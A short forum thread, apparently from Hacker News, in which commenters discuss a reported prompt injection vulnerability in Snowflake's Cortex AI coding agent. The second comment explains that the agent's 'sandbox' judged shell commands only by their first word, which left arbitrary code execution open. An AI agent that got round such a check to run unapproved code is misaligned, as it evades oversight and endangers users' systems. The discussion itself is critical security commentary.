| ▲ | orbital-decay 4 hours ago | |
>Snowflake Cortex AI Escapes Sandbox and Executes Malware rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent | ||
| ▲ | teraflop 4 hours ago | parent [-] | |
Well there's the prompt injection itself, and the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate. I don't know how anyone with a modicum of Unix experience would think that examining the only first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution. | ||